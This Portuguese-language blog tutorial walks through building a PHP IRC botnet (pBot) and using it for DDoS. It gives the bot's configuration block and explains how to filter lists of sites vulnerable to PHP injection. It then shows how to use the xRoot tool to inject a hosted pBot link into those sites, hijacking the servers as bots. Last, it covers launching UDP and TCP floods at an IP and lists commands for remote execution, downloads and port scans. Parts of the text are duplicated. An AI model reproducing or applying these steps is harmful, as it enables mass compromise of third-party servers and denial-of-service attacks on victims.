Primeiramente baixem os programas


Senha para descompactar: www.forum-invaders.com.br

Vocês podem usar também botnets em perl, mas só vai rodar em Linux e é difícil rodar em todas as máquinas de uma vez só.
Configurando
A configuração do pBot é muito simples. A configuração começa na linha número 8. Localize essa parte no script, e vamos então configurar:
Código:
var $config = array("server"=>"irc.chatbr.org",
"port"=>6667,
"pass"=>"fx",
"prefix"=>"fvox",
"maxrand"=>8,
"chan"=>"#forum-invaders",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"b0t",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
"port"=>6667,
"pass"=>"fx",
"prefix"=>"fvox",
"maxrand"=>8,
"chan"=>"#forum-invaders",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"b0t",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
server: Nessa parte da configuração você deve colocar a rede em que os bots vão conectar. Ali eu coloquei irc.chatbr.org, que é uma rede muito boa onde fica o canal do fórum invaders.
port: Porta da rede. A porta padrão é 6667.
pass: Você deve colocar a senha para logar no bot. Sem a senha, você não executa comandos. No caso, a senha que eu escolhi foi fx.
prefix: O nome dos bots são gerados randomicamente. Entretanto, o prefix fica no meio do nome do bot. Exemplo de nome: [A]fvox01080371.
chan: Insira o nome do canal onde os bots vão conectar, e por onde você vai comandar os bots.
password: Caso o canal esteja em modo "+k", ou seja, canal com chave (key), coloque a senha do canal.
O resto das configurações vocês podem deixar assim mesmo.
Arrumando a lista de sites vulneráveis
Para rodar os bots, vocês vão ter que ter uma lista de sites vulneráveis a PHP Injection.
Abra o programa (-TRIAD-) List Sites Editor.exe, clique no botão abrir e selecione a lista de sites vulneráveis.
Na parte "Remover da URL:", coloque um "=" (sem aspas) no campo de texto do "Tudo que estiver a FRENTE de:" e então cliquem no Go.
Agora todos os sites estão só até o "=".
Copie todos os sites usando o Control+C ao invés do botão Salvar. O botão Salvar, grava todos os sites em um arquivo *.rtf ao invés de *.txt.
Agora cole usando Control+V no Blobo de notas e salve o arquivo.

Rodando os bots
Agora chegou a hora de usar o xRoot. Abrindo o xRoot, vamos até a aba Scan.
Vamos clicar no botão Abrir lista e selecionar a lista que filtramos com o Triad List Sites. Aqui eu furtei algumas máquinas do R0ck. *-*

Já com o pBot configurado e upado em algum host, colocamos o link do pBot no campo de texto referente a "CMD pra por:" (não se esqueçam de deixar o "?" depois do .txt. Em "Achar:" pode deixar em branco, afinal é só pro xRoot visitar site por site da lista mesmo.
Agora devemos clicar no botão "Por CMD" e aguardar o xRoot inserir a cmd nas urls.

Depois de colocar a CMD após o "=" com o xRoot, é só clicar no botão "Testar sites...".
Agora como o xRoot visita site por site procurando por vulneráveis, logo os bots vão rodar automaticamente, facilitando muito as coisas!


Logando nos bots
Sem você fazer o login nos bots, eles não te respondem aos comandos.
Para fazer o login, você deve usar o comando .user
A senha é aquela que você definiu na parte de configuração do pBot.
Para logar, vou usar o comando .user b0t, onde "b0t" foi a senha que eu escolhi para fazer esse tutorial.
Atacando
O pBot pode fazer UDP Flood e TCP Flood.
Eu já vi algumas botnets em perl que fazem até syn flood, mas eu curto o pBot

Para pacotar: .udpflood
Eu vou usar 65000 packets, 65000 de packetsize e o delay eu usarei 30.
Então usarei: .udpflood
Como o Muniz é uma alma bem caridosa, ele me forneceu seu IP para ser pacotado, que lindo né?


Comandos pBot
Aqui vai uma lista com outros comandos que vocês podem usar do pBot:
Citação:
= COMMANDS ============================================================================
.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.ud.server [newpass] //change IRC server
---------------------------------------------------------------------------------------
.user
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.dns
.download
.exec
.cmd
.info //get system information
.php
.tcpflood
.udpflood
.raw
.rndnick //change nickname
.pscan
.ud.server
---------------------------------------------------------------------------------------
Pronto qualquer duvida deixe o comentario
1 comentários:
Eu tenho que comprar uma conta mo mIRC?
Postar um comentário